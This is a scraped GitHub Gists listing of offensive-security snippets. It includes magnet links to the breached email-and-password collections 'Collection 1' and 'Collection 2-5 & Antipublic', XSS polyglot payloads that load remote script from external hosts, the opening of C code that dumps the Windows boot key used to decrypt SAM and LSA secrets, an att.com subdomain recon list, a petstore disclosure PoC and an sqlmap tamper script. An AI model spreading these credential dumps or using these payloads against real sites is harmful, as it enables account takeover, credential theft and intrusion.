Skip to content

Instantly share code, notes, and snippets.

View hxlxmj's full-sized avatar

Halim J. hxlxmj

49 followers · 174 following
View GitHub Profile
@fawazahmed0
fawazahmed0 / breach.txt
Last active April 21, 2026 02:19
Email and password breach collection list
# Please Note, I am sharing this, hoping this will be used for good public use, such as data analysis, penetration testing etc
# These links are already available all over the internet
# Also Note, Trying to login into someone else's account without their permission is unethical and illegal
# Collection 1
magnet:?xt=urn:btih:B39C603C7E18DB8262067C5926E7D5EA5D20E12E&dn=Collection%201&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce
# Collection 2-5 & Antipublic
magnet:?xt=urn:btih:D136B1ADDE531F38311FBF43FB96FC26DF1A34CD&dn=Collection%20%232-%235%20%26%20Antipublic&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce
@nullenc0de
nullenc0de / xss_payloads.txt
Last active August 4, 2024 23:02
XSS_Payloads
<Script/Src=//KnoXSS.me/00?1=1290></Script>
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:KnoXSS.me\00?1=1290/.source))//>
JavaScript://%250A0?1:import(/https:KnoXSS.me\00?1=1290/.source)//*'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(d=document,d.body.appendChild(d.createElement(/script/.source)).src=/https:\\KnoXSS.me\00?1=1290/.source)}//\76-->
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->"><img src=x onerror='fetch("https://js.rip/t9eoip8zws)'><script>$.getScript("//js.rip/t9eoip8zws")</script><script src="//js.rip/t9eoip8zws"></script>
@Dfte
Dfte / DumpBootKey.c
Created July 4, 2024 13:49
C code to dump and compute the boot key used to decrypt SAM and LSA secrets.
#include <windows.h>
#include <stdio.h>
#define BOOT_KEY_SIZE 16
#pragma warning(disable: 4996)
void getRegistryClassValue(HKEY rootKey, const char* subKey, char* classValue, DWORD classValueSize) {
HKEY hKey;
LONG result = RegOpenKeyExA(rootKey, subKey, 0, KEY_READ, &hKey);
if (result != ERROR_SUCCESS) {
fprintf(stderr, "Error opening registry key: %ld\n", result);
@PatrikFehrenbach
PatrikFehrenbach / att.txt
Created October 16, 2024 21:35
https://recon-royale.com/ - att.com
shape.att.com
cmp.att.com
canopy-leaf-origin-alp.att.com
h-135-197-224-142.research.att.com
h-135-207-105-153.research.att.com
mdf001ffisxs0003.lax1.ens.att.com
mdf1-bi8k-1-ve-75.wdc1.ens.att.com
mdsxaah05.gcsc.ens.att.com
onboarding-dev.nprd-gw.cloud.att.com
tu-dse.att.com
@HouqiyuA
HouqiyuA / gist:3c36f78e8de9f6a3cfb0959477c07443
Last active November 11, 2025 06:04
Poc for Peststore Information Disclosure Vulnerability
[Description]:
An issue in petstore v1.0.7 allows a remote attacker to execute information disclosure via accessing a non-existent endpoint /cart. The server returns a 404-error page exposing sensitive information including the Servlet name (default) and server version.
[Vulnerability Type]:
Information Disclosure Vulnerability
[Vendor of Product]:
https://github.com/swagger-api/swagger-petstore
[Affected Product Code Base]:
@m3m0o
m3m0o / hex-entity-encode.py
Created October 6, 2025 12:59
SQLMap Tamper to Convert Payloads Characters to Hex Entities
#!/usr/bin/env python3
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
if payload: